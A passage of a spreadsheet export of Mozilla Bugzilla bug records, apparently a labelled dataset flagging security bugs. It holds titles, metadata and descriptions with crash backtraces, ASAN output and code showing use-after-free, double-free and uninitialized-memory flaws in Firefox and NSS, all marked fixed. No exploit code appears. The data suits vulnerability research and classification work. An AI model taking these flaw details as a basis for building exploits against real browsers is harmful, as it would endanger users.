###!!! ASSERTION: element already removed from map: 'mElements.Contains(aElement)', file dom/base/DirectionalityUtils.cpp, line 469
1. Load
2. Wait for GC
3. Quit
heap-buffer-overflow
  #2  mozilla::nsTextNodeDirectionalityMap::RemoveElementFromMap
  #3  mozilla::ResetDir
  ...
  #12 nsCycleCollector::ShutdownCollect</t>
        </is>
      </c>
      <c r="X2832" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2833">
      <c r="A2833" t="n">
        <v>1045977</v>
      </c>
      <c r="B2833" t="inlineStr">
        <is>
          <t>2014-07-29 20:43:10 -0700</t>
        </is>
      </c>
      <c r="C2833" t="inlineStr">
        <is>
          <t>Apparent info leak caused by uninitialized memory with malformed GIFs</t>
        </is>
      </c>
      <c r="D2833" t="inlineStr">
        <is>
          <t>2024-05-30 08:36:16 -0700</t>
        </is>
      </c>
      <c r="E2833" t="n">
        <v>1</v>
      </c>
      <c r="F2833" t="n">
        <v>1</v>
      </c>
      <c r="G2833" t="n">
        <v>3</v>
      </c>
      <c r="H2833" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2833" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2833" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2833" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L2833" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2833" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2833" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2833" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q2833" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2833" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2833" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T2833" t="n">
        <v>1</v>
      </c>
      <c r="U2833" t="n">
        <v>0</v>
      </c>
      <c r="V2833" t="n">
        <v>46</v>
      </c>
      <c r="W2833" t="inlineStr">
        <is>
          <t>Check this out:
http://lcamtuf.coredump.cx/ffgif/
The code repeatedly loads the same image via &lt;img&gt; and then puts it on &lt;canvas&gt;, comparing results. At least on my system, this generates somewhere between 4 and 8 distinct bitmaps. The differences are also apparent visually.
This feels awfully like the use of uninitialized memory; if that's the case, it sounds like a potential security-relevant info leak.
The image in question is:
http://lcamtuf.coredump.cx/ffgif/id:000110,src:000023.gif</t>
        </is>
      </c>
      <c r="X2833" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2834">
      <c r="A2834" t="n">
        <v>908803</v>
      </c>
      <c r="B2834" t="inlineStr">
        <is>
          <t>2013-08-23 11:53:12 -0700</t>
        </is>
      </c>
      <c r="C2834" t="inlineStr">
        <is>
          <t>[fireplace] collections desktop UI work</t>
        </is>
      </c>
      <c r="D2834" t="inlineStr">
        <is>
          <t>2013-08-26 11:35:52 -0700</t>
        </is>
      </c>
      <c r="E2834" t="n">
        <v>1</v>
      </c>
      <c r="F2834" t="n">
        <v>1</v>
      </c>
      <c r="G2834" t="n">
        <v>6</v>
      </c>
      <c r="H2834" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2834" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2834" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K2834" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L2834" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2834" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2834" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2834" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2834" t="inlineStr"/>
      <c r="Q2834" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2834" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2834" t="inlineStr">
        <is>
          <t>2013-08-27</t>
        </is>
      </c>
      <c r="T2834" t="n">
        <v>1</v>
      </c>
      <c r="U2834" t="n">
        <v>0</v>
      </c>
      <c r="V2834" t="n">
        <v>2</v>
      </c>
      <c r="W2834" t="inlineStr">
        <is>
          <t>Collections should look like http://cl.ly/image/1r2h2e0k3m0f on desktop widths for both the homepage and collection details page.
Right now these look like http://cl.ly/image/352U0v2V040x which is incorrect.</t>
        </is>
      </c>
      <c r="X2834" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2835">
      <c r="A2835" t="n">
        <v>700756</v>
      </c>
      <c r="B2835" t="inlineStr">
        <is>
          <t>2011-11-08 12:01:18 -0800</t>
        </is>
      </c>
      <c r="C2835" t="inlineStr">
        <is>
          <t>Support transparent flash plugins</t>
        </is>
      </c>
      <c r="D2835" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E2835" t="n">
        <v>1</v>
      </c>
      <c r="F2835" t="n">
        <v>1</v>
      </c>
      <c r="G2835" t="n">
        <v>6</v>
      </c>
      <c r="H2835" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2835" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2835" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2835" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2835" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2835" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2835" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2835" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2835" t="inlineStr"/>
      <c r="Q2835" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2835" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2835" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2835" t="n">
        <v>1</v>
      </c>
      <c r="U2835" t="n">
        <v>0</v>
      </c>
      <c r="V2835" t="n">
        <v>3</v>
      </c>
      <c r="W2835" t="inlineStr">
        <is>
          <t>Flash uses RGBA32 when wmode=transparent. We draw the flash content to a gfxImageSurface right now, which does not support RGBA32. As a result, transparent mode won't work and we force all flash instances to wmode=opaque (which uses RGB565). We need to support 32bit surfaces and make it work with Flash.</t>
        </is>
      </c>
      <c r="X2835" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2836">
      <c r="A2836" t="n">
        <v>385003</v>
      </c>
      <c r="B2836" t="inlineStr">
        <is>
          <t>2007-06-19 01:41:40 -0700</t>
        </is>
      </c>
      <c r="C2836" t="inlineStr">
        <is>
          <t>Entering a tag name manually ("create and add the tag") should not silently remove the tag from any other bugs. (overwrites)</t>
        </is>
      </c>
      <c r="D2836" t="inlineStr">
        <is>
          <t>2015-02-21 12:32:43 -0800</t>
        </is>
      </c>
      <c r="E2836" t="n">
        <v>1</v>
      </c>
      <c r="F2836" t="n">
        <v>1</v>
      </c>
      <c r="G2836" t="n">
        <v>4</v>
      </c>
      <c r="H2836" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2836" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2836" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K2836" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L2836" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2836" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2836" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2836" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2836" t="inlineStr"/>
      <c r="Q2836" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2836" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2836" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T2836" t="n">
        <v>1</v>
      </c>
      <c r="U2836" t="n">
        <v>0</v>
      </c>
      <c r="V2836" t="n">
        <v>6</v>
      </c>
      <c r="W2836" t="inlineStr">
        <is>
          <t>StR:
1. Go to a bug.
2. Add a useless named tag to it by entering the tag's name into the "or create and add the tag" field.
3. Go to another bug
4. Add the same tag to it, but instead of selecting the tag's name from the drop-down list, do it the same way as in step 2.
5. Click the tag name in your named tags / saved searches list.
Actual results:
There is only the second bug in the list.
Expected results:
There are both bugs in the list.
Or it impossible to perform step 4 as easily (a warning or something).
Or there is a prominent warning text when going to perform step 2 or 4.
It's similar to bug 365403, but is more likely to have been intended.</t>
        </is>
      </c>
      <c r="X2836" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2837">
      <c r="A2837" t="n">
        <v>1290800</v>
      </c>
      <c r="B2837" t="inlineStr">
        <is>
          <t>2016-08-01 00:00:06 -0700</t>
        </is>
      </c>
      <c r="C2837" t="inlineStr">
        <is>
          <t>Backfill v7 and failed pings into their respective tables</t>
        </is>
      </c>
      <c r="D2837" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E2837" t="n">
        <v>1</v>
      </c>
      <c r="F2837" t="n">
        <v>1</v>
      </c>
      <c r="G2837" t="n">
        <v>6</v>
      </c>
      <c r="H2837" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2837" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J2837" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K2837" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2837" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2837" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2837" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2837" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2837" t="inlineStr">
        <is>
          <t>[SvcOps]</t>
        </is>
      </c>
      <c r="Q2837" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2837" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2837" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2837" t="n">
        <v>1</v>
      </c>
      <c r="U2837" t="n">
        <v>0</v>
      </c>
      <c r="V2837" t="n">
        <v>5</v>
      </c>
      <c r="W2837" t="inlineStr">
        <is>
          <t>Failed into download_stats_errors_* tables, v7 into downloads_stats_* tables.</t>
        </is>
      </c>
      <c r="X2837" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2838">
      <c r="A2838" t="n">
        <v>490425</v>
      </c>
      <c r="B2838" t="inlineStr">
        <is>
          <t>2009-04-28 02:09:26 -0700</t>
        </is>
      </c>
      <c r="C2838" t="inlineStr">
        <is>
          <t>Crash [@ nsViewManager::DispatchEvent]</t>
        </is>
      </c>
      <c r="D2838" t="inlineStr">
        <is>
          <t>2015-10-16 11:51:35 -0700</t>
        </is>
      </c>
      <c r="E2838" t="n">
        <v>1</v>
      </c>
      <c r="F2838" t="n">
        <v>1</v>
      </c>
      <c r="G2838" t="n">
        <v>3</v>
      </c>
      <c r="H2838" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2838" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2838" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2838" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L2838" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2838" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2838" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2838" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2838" t="inlineStr">
        <is>
          <t>[sg:critical?] [needs 1.8 landing]</t>
        </is>
      </c>
      <c r="Q2838" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2838" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2838" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2838" t="n">
        <v>1</v>
      </c>
      <c r="U2838" t="n">
        <v>0</v>
      </c>
      <c r="V2838" t="n">
        <v>40</v>
      </c>
      <c r="W2838" t="inlineStr">
        <is>
          <t>Created attachment 374874
crash backtrace
Downstream bug - https://bugzilla.redhat.com/show_bug.cgi?id=488570
in nsViewManager::DispatchEvent() there's a code:
1130                  vm-&gt;DoSetWindowDimensions(vm-&gt;mDelayedResize.width,
1131                                            vm-&gt;mDelayedResize.height);
1132                  vm-&gt;mDelayedResize.SizeTo(NSCOORD_NONE, NSCOORD_NONE);
1133
1134                  // Paint later.
1135                  vm-&gt;UpdateView(vm-&gt;mRootView, NS_VMREFRESH_NO_SYNC);
but vm (nsViewManager *) can be destroyed in DoSetWindowDimensions() so 
vm-&gt;UpdateView(vm-&gt;mRootView, NS_VMREFRESH_NO_SYNC);
uses already freed object. (vm is a normal pointer here). In this particular case ViewManager is destroyed because of frame style change:
#0  DocumentViewerImpl::Hide (this=0xae8eccc0) at nsDocumentViewer.cpp:1997
#1  0x0699561c in nsDocShell::SetVisibility (this=0xaffa6e60, aVisibility=0)
at nsDocShell.cpp:3970
#2  0x012c63a0 in nsSubDocumentFrame::Destroy (this=0xae4723d4) at
nsFrameFrame.cpp:775
#3  0x01291058 in nsBlockFrame::DoRemoveFrame (this=0xafef269c,
aDeletedFrame=0xae4723d4,
    aDestroyFrames=1, aRemoveOnlyFluidContinuations=0) at
nsBlockFrame.cpp:5415
#4  0x012916fe in nsBlockFrame::RemoveFrame (this=0xafef269c, aListName=0x0,
aOldFrame=0xae4723d4)
    at nsBlockFrame.cpp:5013
#5  0x0124ac94 in nsFrameManager::RemoveFrame (this=0xb2e8681c,
aParentFrame=0xafef269c,
    aListName=0x0, aOldFrame=0xae4723d4) at nsFrameManager.cpp:694
#6  0x012066ba in nsCSSFrameConstructor::ContentRemoved (this=0xaea11120,
aContainer=0xae6f7060,
    aChild=0xaeac4460, aIndexInContainer=0, aDidReconstruct=0xbfe46a8c)
    at nsCSSFrameConstructor.cpp:9644
#7  0x01203ee0 in nsCSSFrameConstructor::RecreateFramesForContent
(this=0xaea11120,
    aContent=0xaeac4460) at nsCSSFrameConstructor.cpp:11278
#8  0x012042f8 in nsCSSFrameConstructor::ProcessRestyledFrames
(this=0xaea11120,
    aChangeList=@0xbfe46b70) at nsCSSFrameConstructor.cpp:10018
#9  0x012047d0 in nsCSSFrameConstructor::RestyleElement (this=0xaea11120,
aContent=0xaf9d70e0,
    aPrimaryFrame=0xafad1d98, aMinHint=0) at nsCSSFrameConstructor.cpp:10087
#10 0x012049c5 in nsCSSFrameConstructor::ProcessOneRestyle (this=0xaea11120,
aContent=0xaf9d70e0,
    aRestyleHint=eReStyle_Self, aChangeHint=0) at
nsCSSFrameConstructor.cpp:13422
#11 0x01204bfc in nsCSSFrameConstructor::ProcessPendingRestyles
(this=0xaea11120)
    at nsCSSFrameConstructor.cpp:13518
#12 0x012743c6 in PresShell::DoFlushPendingNotifications (this=0xb2e86800,
aType=Flush_Layout,
    aInterruptibleReflow=1) at nsPresShell.cpp:4540
#13 0x01274609 in PresShell::WillPaint (this=0xb2e86800) at
nsPresShell.cpp:6005
#14 0x01740328 in nsViewManager::FlushPendingInvalidates (this=0xafdc2860)
    at nsViewManager.cpp:2285
#15 0x0174052d in nsViewManager::EnableRefresh (this=0xafdc2860,
aUpdateFlags=0)
    at nsViewManager.cpp:1998
#16 0x0173ca1a in nsViewManager::EndUpdateViewBatch (this=0xafdc2860,
aUpdateFlags=0)
    at nsViewManager.cpp:2041
#17 0x0120d770 in nsIViewManager::UpdateViewBatch::EndUpdateViewBatch
(this=0xbfe47458,
    aUpdateFlags=0) at ../../../dist/include/view/nsIViewManager.h:379
#18 0x012711ce in PresShell::ResizeReflow (this=0xae469400, aWidth=18000,
aHeight=28080)
    at nsPresShell.cpp:2579
#19 0x012608d8 in PresShell::ResizeReflow (this=0xae469400, aView=0xaea544c0,
aWidth=18000,
    aHeight=28080) at nsPresShell.cpp:5977
#20 0x01743b38 in nsViewManager::DoSetWindowDimensions (this=0xaea54580,
aWidth=18000,
    aHeight=28080) at nsViewManager.h:325
#21 0x017410c8 in nsViewManager::DispatchEvent (this=0xaea54580,
aEvent=0xbfe47748,
    aStatus=0xbfe47660) at nsViewManager.cpp:1131
#22 0x01736a33 in HandleEvent (aEvent=0xbfe47748) at nsView.cpp:168
#23 0x06c17fed in nsCommonWidget::DispatchEvent (this=0xaeb0d280,
aEvent=0xbfe47748,
    aStatus=@0xbfe47794) at nsCommonWidget.cpp:158
#24 0x06c0a91a in nsWindow::OnExposeEvent (this=0xaeb0d280,
aWidget=0xb7b5b428, aEvent=0xbfe47e04)
    at nsWindow.cpp:1776
(gdb) f 0
#0  DocumentViewerImpl::Hide (this=0xae8eccc0) at nsDocumentViewer.cpp:1997
1997      GetDocumentSelection(getter_AddRefs(selection));
(gdb) p mViewManager
$8 = {mRawPtr = 0xaea54580}
(gdb) f 21
#21 0x017410c8 in nsViewManager::DispatchEvent (this=0xaea54580,
aEvent=0xbfe47748,
    aStatus=0xbfe47660) at nsViewManager.cpp:1131
(gdb) p vm
$6 = (nsViewManager *) 0xaea54580</t>
        </is>
      </c>
      <c r="X2838" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2839">
      <c r="A2839" t="n">
        <v>583957</v>
      </c>
      <c r="B2839" t="inlineStr">
        <is>
          <t>2010-08-02 19:25:02 -0700</t>
        </is>
      </c>
      <c r="C2839" t="inlineStr">
        <is>
          <t>"ASSERTION: killing mutation events" in nsMenuFrame::UpdateMenuType</t>
        </is>
      </c>
      <c r="D2839" t="inlineStr">
        <is>
          <t>2011-02-09 09:08:13 -0800</t>
        </is>
      </c>
      <c r="E2839" t="n">
        <v>1</v>
      </c>
      <c r="F2839" t="n">
        <v>1</v>
      </c>
      <c r="G2839" t="n">
        <v>3</v>
      </c>
      <c r="H2839" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2839" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2839" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2839" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2839" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2839" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2839" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2839" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2839" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:patch]</t>
        </is>
      </c>
      <c r="Q2839" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2839" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2839" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2839" t="n">
        <v>1</v>
      </c>
      <c r="U2839" t="n">
        <v>0</v>
      </c>
      <c r="V2839" t="n">
        <v>16</v>
      </c>
      <c r="W2839" t="inlineStr">
        <is>
          <t>Created attachment 462305
testcase
###!!! ASSERTION: Want to fire mutation events, but it's not safe: '(aNode-&gt;IsNodeOfType(nsINode::eCONTENT) &amp;&amp; static_cast&lt;nsIContent*&gt;(aNode)-&gt; IsInNativeAnonymousSubtree()) || sScriptBlockerCount == sRemovableScriptBlockerCount', file content/base/src/nsContentUtils.cpp, line 3619
###!!! ASSERTION: killing mutation events: 'nsContentUtils::IsSafeToRunScript()', file content/base/src/nsContentUtils.cpp, line 6142
###!!! ASSERTION: This is unsafe! Fix the caller!: 'Error', file content/events/src/nsEventDispatcher.cpp, line 514
Security-sensitive because previous bugs with these assertions (bug 557398, bug 564461) were deemed to be likely-exploitable.</t>
        </is>
      </c>
      <c r="X2839" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2840">
      <c r="A2840" t="n">
        <v>985070</v>
      </c>
      <c r="B2840" t="inlineStr">
        <is>
          <t>2014-03-18 12:09:28 -0700</t>
        </is>
      </c>
      <c r="C2840" t="inlineStr">
        <is>
          <t>SECKEY_DecodeDERPublicKey double-frees the arena when decoding fails</t>
        </is>
      </c>
      <c r="D2840" t="inlineStr">
        <is>
          <t>2016-06-04 15:33:28 -0700</t>
        </is>
      </c>
      <c r="E2840" t="n">
        <v>1</v>
      </c>
      <c r="F2840" t="n">
        <v>1</v>
      </c>
      <c r="G2840" t="n">
        <v>3</v>
      </c>
      <c r="H2840" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2840" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2840" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2840" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2840" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2840" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2840" t="inlineStr">
        <is>
          <t>[qa-][adv-main31+][adv-esr24.7+]</t>
        </is>
      </c>
      <c r="Q2840" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2840" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2840" t="inlineStr">
        <is>
          <t>3.16.1</t>
        </is>
      </c>
      <c r="T2840" t="n">
        <v>1</v>
      </c>
      <c r="U2840" t="n">
        <v>0</v>
      </c>
      <c r="V2840" t="n">
        <v>23</v>
      </c>
      <c r="W2840" t="inlineStr">
        <is>
          <t>SECKEYPublicKey *
SECKEY_DecodeDERPublicKey(const SECItem *pubkder)
{
    PLArenaPool *arena;
    SECKEYPublicKey *pubk;
    SECStatus rv;
    SECItem newPubkder;
    arena = PORT_NewArena (DER_DEFAULT_CHUNKSIZE);
    if (arena == NULL) {
        PORT_SetError (SEC_ERROR_NO_MEMORY);
        return NULL;
    }
    pubk = (SECKEYPublicKey *) PORT_ArenaZAlloc (arena, sizeof (SECKEYPublicKey));
    if (pubk != NULL) {
        pubk-&gt;arena = arena;
        pubk-&gt;pkcs11Slot = NULL;
        pubk-&gt;pkcs11ID = 0;
        prepare_rsa_pub_key_for_asn1(pubk);
        /* copy the DER into the arena, since Quick DER returns data that points
           into the DER input, which may get freed by the caller */
        rv = SECITEM_CopyItem(arena, &amp;newPubkder, pubkder);
        if ( rv == SECSuccess ) {
            rv = SEC_QuickDERDecodeItem(arena, pubk, SECKEY_RSAPublicKeyTemplate,
                                &amp;newPubkder);
        }
        if (rv == SECSuccess)
            return pubk;
        SECKEY_DestroyPublicKey (pubk);
    } else {
        PORT_SetError (SEC_ERROR_NO_MEMORY);
    }
    PORT_FreeArena (arena, PR_FALSE);
    return NULL;
}
If SEC_QuickDERDecodeItem fails, SECKEY_DestroyPublicKey will be called, which calls PORT_FreeArena on pubk-&gt;arena. pubk-&gt;arena is an alias for arena. PORT_FreeArena then gets called on arena for the second time.</t>
        </is>
      </c>
      <c r="X2840" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2841">
      <c r="A2841" t="n">
        <v>1849704</v>
      </c>
      <c r="B2841" t="inlineStr">
        <is>
          <t>2023-08-22 03:51:37 -0700</t>
        </is>
      </c>
      <c r="C2841" t="inlineStr">
        <is>
          <t>heap-use-after-free xpcom/ds/PLDHashTable.cpp:546 in PLDHashTable::Remove with ImageBitmapShutdownObserver</t>
        </is>
      </c>
      <c r="D2841" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:55 -0700</t>
        </is>
      </c>
      <c r="E2841" t="n">
        <v>1</v>
      </c>
      <c r="F2841" t="n">
        <v>1</v>
      </c>
      <c r="G2841" t="n">
        <v>3</v>
      </c>
      <c r="H2841" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2841" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2841" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2841" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2841" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2841" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2841" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2841" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2841" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main118+]</t>
        </is>
      </c>
      <c r="Q2841" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2841" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2841" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T2841" t="n">
        <v>1</v>
      </c>
      <c r="U2841" t="n">
        <v>0</v>
      </c>
      <c r="V2841" t="n">
        <v>20</v>
      </c>
      <c r="W2841" t="inlineStr">
        <is>
          <t>Created attachment 9349853
poc.html
#Summary
heap-use-after-free xpcom/ds/PLDHashTable.cpp:546 in PLDHashTable::Remove
#Reproduce
OS:Win10 X64
118.0a1 (2023-08-21) (64-bit)
step:
1. install node &amp; puppeteer-core (for easy reproduce)
2. python -m http.server 1337
3. node ff.test2.js test http://localhost:1337/poc.html 30 firefox.exe_path
#Type of crash
Tab process
#Analysis
coming soon
#ASAN
=================================================================
==14772==ERROR: AddressSanitizer: heap-use-after-free on address 0x119d234cc1d8 at pc 0x7ffafd5d922e bp 0x008a8fdfe1d0 sp 0x008a8fdfe218
READ of size 4 at 0x119d234cc1d8 thread T0
    #0 0x7ffafd5d922d in PLDHashTable::Remove /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:546
    #1 0x7ffb034f2b86 in mozilla::dom::ImageBitmap::~ImageBitmap /builds/worker/checkouts/gecko/dom/canvas/ImageBitmap.cpp:665
    #2 0x7ffb0353152f in mozilla::dom::ImageBitmap::cycleCollection::DeleteCycleCollectable /builds/worker/workspace/obj-build/dist/include/mozilla/dom/ImageBitmap.h:85
    #3 0x7ffafd552f86 in SnowWhiteKiller::~SnowWhiteKiller /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2473
    #4 0x7ffafd55185e in nsCycleCollector::FreeSnowWhite /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2663
    #5 0x7ffafd55d195 in nsCycleCollector::BeginCollection /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3660
    #6 0x7ffafd55c16f in nsCycleCollector::Collect /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3484
    #7 0x7ffafd55b9e0 in nsCycleCollector::ShutdownCollect /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3418
    #8 0x7ffafd561ffc in nsCycleCollector_shutdown /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:4046
    #9 0x7ffafd82f6d0 in mozilla::ShutdownXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:693
    #10 0x7ffb0c0cf54a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:661
    #11 0x7ff6e0c92953 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:375
    #12 0x7ff6e0c9169b in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #13 0x7ff6e0d734e7 in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #14 0x7ffbb0d17613 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x180017613)
    #15 0x7ffbb0fe26b0 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x1800526b0)
0x119d234cc1d8 is located 56 bytes inside of 64-byte region [0x119d234cc1a0,0x119d234cc1e0)
freed by thread T0 here:
    #0 0x7ffb5fd4f28d in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
